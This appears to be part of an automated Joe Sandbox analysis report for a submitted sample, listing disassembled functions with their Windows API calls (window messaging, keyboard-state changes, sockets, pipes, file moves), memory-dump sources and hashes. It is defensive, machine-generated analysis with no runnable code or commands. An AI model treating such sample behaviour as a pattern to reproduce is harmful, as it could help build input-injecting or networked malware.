GetMenuItemCount.USER32(00000000), ref: 001B21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001B21DD
_wcslen.LIBCMT ref: 001B2213
GetMenuItemID.USER32(?,?), ref: 001B224D
GetSubMenu.USER32(?,?), ref: 001B225B

Part of subcall function 00183A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00183A57
Part of subcall function 00183A3D: GetCurrentThreadId.KERNEL32 ref: 00183A5E
Part of subcall function 00183A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001825B3), ref: 00183A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001B22E3

Part of subcall function 0018E97B: Sleep.KERNEL32 ref: 0018E9F3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 40a3b70a02ee99ae3eda73552e0be5b623dc44f95d85a2809aeee65d80cf0169
Instruction ID: 6b903899412b4a61acf76e65758603397dbea47e5bb6b264659c66eba8983687
Opcode Fuzzy Hash: 40a3b70a02ee99ae3eda73552e0be5b623dc44f95d85a2809aeee65d80cf0169
Instruction Fuzzy Hash: B4719F75E00215AFCB14EF68C885AEEB7F1EF48310F158499E916EB351D734EE468B90

Uniqueness

Uniqueness Score: -1.00%

Function 001B7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01786F38), ref: 001B7F37
IsWindowEnabled.USER32(01786F38), ref: 001B7F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 001B801E
SendMessageW.USER32(01786F38,000000B0,?,?), ref: 001B8051
IsDlgButtonChecked.USER32(?,?), ref: 001B8089
GetWindowLongW.USER32(01786F38,000000EC), ref: 001B80AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001B80C3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: f5ff6a20ad3a2804e7147f4681b11cfcfd9e320008f8a6d7ff347927c6698388
Instruction ID: c1e9e58fd43037f632997de160ceb50bb9c40224c8042059615e3003d3b8cbc2
Opcode Fuzzy Hash: f5ff6a20ad3a2804e7147f4681b11cfcfd9e320008f8a6d7ff347927c6698388
Instruction Fuzzy Hash: 1F71BE34609204AFEB25AF64C884FFABBB9EF99340F14045DF955972A1CB31AC45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0018AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0018AEF9
GetKeyboardState.USER32(?), ref: 0018AF0E
SetKeyboardState.USER32(?), ref: 0018AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0018AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0018AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0018AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0018B020

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 917bc83e21fffd14f8f0e2c4be1ab4e5ac1adbd624e99211eb834ad2c9585186
Instruction ID: 25bfa5f93ae3c7292b1810cf17c2ffee43b69d7bde47d9de322c1248e15a3ed3
Opcode Fuzzy Hash: 917bc83e21fffd14f8f0e2c4be1ab4e5ac1adbd624e99211eb834ad2c9585186
Instruction Fuzzy Hash: B351E5A06087D53EFB3662348C85BBBBFA95F06304F08858AF2D5558C2D3D8AED4DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0018ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0018AD19
GetKeyboardState.USER32(?), ref: 0018AD2E
SetKeyboardState.USER32(?), ref: 0018AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0018ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0018ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0018AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0018AE38

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c418834f41e9c17b6c3214bfd540922c2f88fae57dd6fd3a2fc3a43a1f2c729b
Instruction ID: 948f0a14b85165900ac082078c2be6dd4ff6a8f37a249ecd8467cad166c76c5d
Opcode Fuzzy Hash: c418834f41e9c17b6c3214bfd540922c2f88fae57dd6fd3a2fc3a43a1f2c729b
Instruction Fuzzy Hash: 9F5139A05087D13EFB33A3748C95B7ABFA95F05301F48898AE1D5868C3D394EE84DB52

Uniqueness

Uniqueness Score: -1.00%

Function 0015542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00163CD6,?,?,?,?,?,?,?,?,00155BA3,?,?,00163CD6,?,?), ref: 00155470
__fassign.LIBCMT ref: 001554EB
__fassign.LIBCMT ref: 00155506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00163CD6,00000005,00000000,00000000), ref: 0015552C
WriteFile.KERNEL32(?,00163CD6,00000000,00155BA3,00000000,?,?,?,?,?,?,?,?,?,00155BA3,?), ref: 0015554B
WriteFile.KERNEL32(?,?,00000001,00155BA3,00000000,?,?,?,?,?,?,?,?,?,00155BA3,?), ref: 00155584

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: bbdad29df02d9aec2db05dd0543b1cd83e91a4476133fef8cd31efc8a9797361
Instruction ID: ab96d062a85c9f0434c2bb888d7b29286ba902780e430355093cf737deb3d6dd
Opcode Fuzzy Hash: bbdad29df02d9aec2db05dd0543b1cd83e91a4476133fef8cd31efc8a9797361
Instruction Fuzzy Hash: E751E670910649DFDB11CFA8D855AEEBBFAEF08301F14411AF965EB291E7309A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00142D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00142D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00142D53
_ValidateLocalCookies.LIBCMT ref: 00142DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00142E0C
_ValidateLocalCookies.LIBCMT ref: 00142E61

Strings

csm, xrefs: 00142DF6

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3593844589f5a66b89b589028d8864dccd90e6119be9247ffaa470c88c01e3d5
Instruction ID: 4a9a7846cae8b60cf21fd722c3fce8a1fae9bc72a7df017002df6112bf82ea57
Opcode Fuzzy Hash: 3593844589f5a66b89b589028d8864dccd90e6119be9247ffaa470c88c01e3d5
Instruction Fuzzy Hash: 5F41AF34E00209EBCF14DFA8C885A9EBBB5BF44324F548155F915AB3A2D731AA81CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001A10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001A304E: inet_addr.WSOCK32(?), ref: 001A307A
Part of subcall function 001A304E: _wcslen.LIBCMT ref: 001A309B

socket.WSOCK32(00000002,00000001,00000006), ref: 001A1112
WSAGetLastError.WSOCK32 ref: 001A1121
WSAGetLastError.WSOCK32 ref: 001A11C9
closesocket.WSOCK32(00000000), ref: 001A11F9

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 137aebdd1107c76891937d2dc93038a34c331395341b3d4b9631697355b8c976
Instruction ID: d045045aa6dc74b4fe44ceae96a455a6e937675e73d8ceee13f025da83e7ac40
Opcode Fuzzy Hash: 137aebdd1107c76891937d2dc93038a34c331395341b3d4b9631697355b8c976
Instruction Fuzzy Hash: 43410639600214AFDB109F24D884BAABBEAFF46364F148159FD159F292D770ED81CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0018CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0018DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0018CF22,?), ref: 0018DDFD

Part of subcall function 0018DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0018CF22,?), ref: 0018DE16

lstrcmpiW.KERNEL32(?,?), ref: 0018CF45
MoveFileW.KERNEL32(?,?), ref: 0018CF7F
_wcslen.LIBCMT ref: 0018D005
_wcslen.LIBCMT ref: 0018D01B
SHFileOperationW.SHELL32(?), ref: 0018D061

Strings

\*.*, xrefs: 0018CFF3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: e12f53550e14c84591c0bcb3d9142d769b6ff2f5264c76336880d25d0eaca674
Instruction ID: 6fd58ab052d8b973c5cafdc9eb0c1a7289245b0747ae75d09b8d565eede758c5
Opcode Fuzzy Hash: e12f53550e14c84591c0bcb3d9142d769b6ff2f5264c76336880d25d0eaca674
Instruction Fuzzy Hash: FD4115719452185FDF16FBA4D981EDEB7B9AF18380F1000E6E605EB151EB34A785CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001B2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001B2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 001B2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 001B2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001B2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001B2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 001B2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001B2F0B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d232339f373d29501840ce410b261ef7b15079a6a0aceceff2ddd3cee969708f
Instruction ID: 6c7d4cbb1abf67f201b2e5d603abeeed6a1cd6e63df3afffe732c00156672c46
Opcode Fuzzy Hash: d232339f373d29501840ce410b261ef7b15079a6a0aceceff2ddd3cee969708f
Instruction Fuzzy Hash: 2331FF30604250AFEB218F5ADC84FE537E5FB9A714F1501A4F9008B6B2CBB1E888DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00187726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00187769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0018778F
SysAllocString.OLEAUT32(00000000), ref: 00187792
SysAllocString.OLEAUT32(?), ref: 001877B0
SysFreeString.OLEAUT32(?), ref: 001877B9
StringFromGUID2.OLE32(?,?,00000028), ref: 001877DE
SysAllocString.OLEAUT32(?), ref: 001877EC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a69872de5e2e3025388a462e88ab39eb9151f92cf04f843a4d89d62c9b909fd2
Instruction ID: e580de2a8a18c671dc98f874d4ed7c81e9bc570f25a9e2aa84881e4424c6a1b4
Opcode Fuzzy Hash: a69872de5e2e3025388a462e88ab39eb9151f92cf04f843a4d89d62c9b909fd2
Instruction Fuzzy Hash: 14219276604219AFDB10EFA8CC88CBB77ACEB09764B148525F915DB190D770DE81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001877FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00187842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00187868
SysAllocString.OLEAUT32(00000000), ref: 0018786B
SysAllocString.OLEAUT32 ref: 0018788C
SysFreeString.OLEAUT32 ref: 00187895
StringFromGUID2.OLE32(?,?,00000028), ref: 001878AF
SysAllocString.OLEAUT32(?), ref: 001878BD

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9e746a36ea6fb089d3eaa4b68c70725b40875742e2e71dc6f5538b52a67196d5
Instruction ID: 22d367d5c33455213b40486857c27c2b7bc7ec721769fffd93c852d26266719e
Opcode Fuzzy Hash: 9e746a36ea6fb089d3eaa4b68c70725b40875742e2e71dc6f5538b52a67196d5
Instruction Fuzzy Hash: BB217131608204AFDB10AFA8DC88DAA77ECEB09760B208125F915CB2A1DB70DD81CF74

Uniqueness

Uniqueness Score: -1.00%

Function 001904D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 001904F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0019052E

Strings

nul, xrefs: 00190567

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: ca7bf62e84a86eb41e0a4d168278f4634efbe4ab5aa6354c0dd5516fa7852a86
Instruction ID: 11889f68059d38d390d3b590c6702a89b43f7722a6c42bea23d123e8df335a35
Opcode Fuzzy Hash: ca7bf62e84a86eb41e0a4d168278f4634efbe4ab5aa6354c0dd5516fa7852a86
Instruction Fuzzy Hash: B3218B71500305AFEF219F29DC04A9A7BF8BF49764F614A29F8A1E72E0D7709980CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001905A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001905C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00190601

Strings

nul, xrefs: 00190639

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: dadf52c813f0b5b9543026318bb78d30644b058b3dfa805713ca1aa774191904
Instruction ID: 0a1881bce82654660384283f987574854d32376496904aba3074be8b8ec697e3
Opcode Fuzzy Hash: dadf52c813f0b5b9543026318bb78d30644b058b3dfa805713ca1aa774191904
Instruction Fuzzy Hash: 042174755003059FDF219F69DC04A9A77E8BF99734F200B19F8A1E72E0E77099A0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001B40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0012600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0012604C
Part of subcall function 0012600E: GetStockObject.GDI32(00000011), ref: 00126060
Part of subcall function 0012600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001B4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001B411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001B412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001B4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001B4145

Strings

Msctls_Progress32, xrefs: 001B40E3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: ad6279d2b22c979827253ff6366bf092a32b05c11a1b480cb9dedc26476d2754
Instruction ID: 17df6ac10dcb9dbeb9257bfda7c7148893843efdae67f113fa7112e0b9363be4
Opcode Fuzzy Hash: ad6279d2b22c979827253ff6366bf092a32b05c11a1b480cb9dedc26476d2754
Instruction Fuzzy Hash: E711B2B2150219BFEF119F64CC85EE77F5DEF18798F018111FA18A2190C7729C61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0015D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0015D7A3: _free.LIBCMT ref: 0015D7CC

_free.LIBCMT ref: 0015D82D

Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0

_free.LIBCMT ref: 0015D838
_free.LIBCMT ref: 0015D843
_free.LIBCMT ref: 0015D897
_free.LIBCMT ref: 0015D8A2
_free.LIBCMT ref: 0015D8AD
_free.LIBCMT ref: 0015D8B8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 57dab20c191dc67da4e25a37c06dcb936870d57c6e2b1a25bce7aa4ba6dcf975
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: 1B118C32540B04EAD531BFF0DC06FCB7B9CAF29306F400824FAA9AE992CBB4A5094751

Uniqueness

Uniqueness Score: -1.00%

Function 0018DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0018DA74
LoadStringW.USER32(00000000), ref: 0018DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0018DA91
LoadStringW.USER32(00000000), ref: 0018DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0018DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0018DAB9

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

